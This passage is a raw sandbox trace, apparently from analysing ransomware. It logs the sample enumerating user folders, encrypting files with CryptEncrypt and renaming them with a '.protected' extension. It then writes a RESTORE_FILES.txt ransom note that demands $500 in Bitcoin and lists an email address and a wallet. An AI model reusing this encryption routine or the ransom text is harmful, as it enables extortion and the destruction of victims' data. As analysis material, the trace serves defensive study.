lpFindFileData=0x295ea40) returned 0 [0093.384] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.384] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 136 [0093.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.384] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.384] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.385] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 113 [0093.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.385] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.385] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\RESTORE_FILES.txt") returned 104 [0093.385] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.385] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.385] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.385] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.385] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\RESTORE_FILES.txt") returned 104 [0093.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.386] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.386] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned 87 [0093.386] lstrcmpW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2=".") returned 1 [0093.386] lstrcmpW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="..") returned 1 [0093.387] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*") returned 89 [0093.387] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.387] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\.") returned 89 [0093.387] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.387] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.387] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\..") returned 90 [0093.387] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.387] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.387] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.387] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages") returned 96 [0093.387] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.387] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.387] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*") returned 98 [0093.387] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.388] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\.") returned 98 [0093.388] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.388] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.388] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.389] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.389] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.389] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.389] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi.protected", lpSrch=".protected") returned=".protected" [0093.390] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.390] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.392] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.392] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.392] StrStrIW (lpFirst="state.rsm.protected", lpSrch=".protected") returned=".protected" [0093.392] StrStrIW (lpFirst="VC_redist.x64.exe.protected", lpSrch=".protected") returned=".protected" [0093.392] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.392] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.392] StrStrIW (lpFirst="state.rsm.protected", lpSrch=".protected") returned=".protected" [0093.392] StrStrIW (lpFirst="vcredist_x86.exe.protected", lpSrch=".protected") returned=".protected" [0093.392] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.392] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.392] StrStrIW (lpFirst="state.rsm.protected", lpSrch=".protected") returned=".protected" [0093.392] StrStrIW (lpFirst="VC_redist.x86.exe.protected", lpSrch=".protected") returned=".protected" [0093.393] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.393] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.393] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.393] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.393] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.393] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi.protected", lpSrch=".protected") returned=".protected" [0093.394] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.394] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.394] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.394] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.396] StrStrIW (lpFirst="jaureglist.xml.protected", lpSrch=".protected") returned=".protected" [0093.396] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.396] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.396] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.396] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.396] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.396] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.397] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.397] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.397] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0093.397] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0093.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\." (normalized: "c:\\users\\default\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.397] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.397] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.397] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0093.397] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0093.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\.." (normalized: "c:\\users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.398] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.398] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.398] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0093.398] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0093.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\." (normalized: "c:\\users\\default\\appdata\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.398] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.398] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.398] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0093.398] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0093.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.400] StrStrIW (lpFirst="IconCache.db", lpSrch=".protected") returned 0x0 [0093.400] lstrcmpW (lpString1="IconCache.db", lpString2="RESTORE_FILES.txt") returned -1 [0093.400] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0093.400] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0093.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0093.401] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db") returned 47 [0093.401] StrStrW (lpFirst="IconCache.db", lpSrch=".txt") returned 0x0 [0093.401] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db") returned 47 [0093.401] StrStrW (lpFirst="IconCache.db", lpSrch=".rar") returned 0x0 [0093.401] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db") returned 47 [0093.401] StrStrW (lpFirst="IconCache.db", lpSrch=".zip") returned 0x0 [0093.401] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0093.452] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.452] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0093.453] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.453] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0093.474] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0093.474] CloseHandle (hObject=0xd4) returned 1 [0093.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db.protected" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db.protected")) returned 1 [0093.476] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.476] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0093.476] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files") returned -1 [0093.476] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files (x86)") returned -1 [0093.476] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0093.476] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0093.476] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft") returned 44 [0093.476] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0093.476] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0093.476] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*") returned 46 [0093.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.487] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.487] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.488] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.488] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.488] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.488] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\.") returned 46 [0093.488] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.488] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.488] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.488] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.488] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.488] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.488] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.488] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\..") returned 47 [0093.488] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.488] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.488] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.488] lstrcmpiW (lpString1="Credentials", lpString2="Windows") returned -1 [0093.488] lstrcmpiW (lpString1="Credentials", lpString2="Program Files") returned -1 [0093.488] lstrcmpiW (lpString1="Credentials", lpString2="Program Files (x86)") returned -1 [0093.488] lstrcmpiW (lpString1="Credentials", lpString2="$Recycle.bin") returned 1 [0093.488] lstrcmpiW (lpString1="Credentials", lpString2="System Volume Information") returned -1 [0093.488] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials") returned 56 [0093.488] lstrcmpW (lpString1="Credentials", lpString2=".") returned 1 [0093.488] lstrcmpW (lpString1="Credentials", lpString2="..") returned 1 [0093.489] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\*") returned 58 [0093.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.489] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.489] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.489] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.489] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.489] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.489] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\.") returned 58 [0093.489] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.489] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.489] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.489] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.489] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.489] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\credentials\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.489] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.489] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.489] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.489] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.489] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.489] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.489] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\..") returned 59 [0093.490] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.490] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.490] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.490] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.490] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.490] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.490] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.490] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.490] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\RESTORE_FILES.txt") returned 74 [0093.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\credentials\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0093.491] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.491] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0093.491] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.491] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0093.492] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 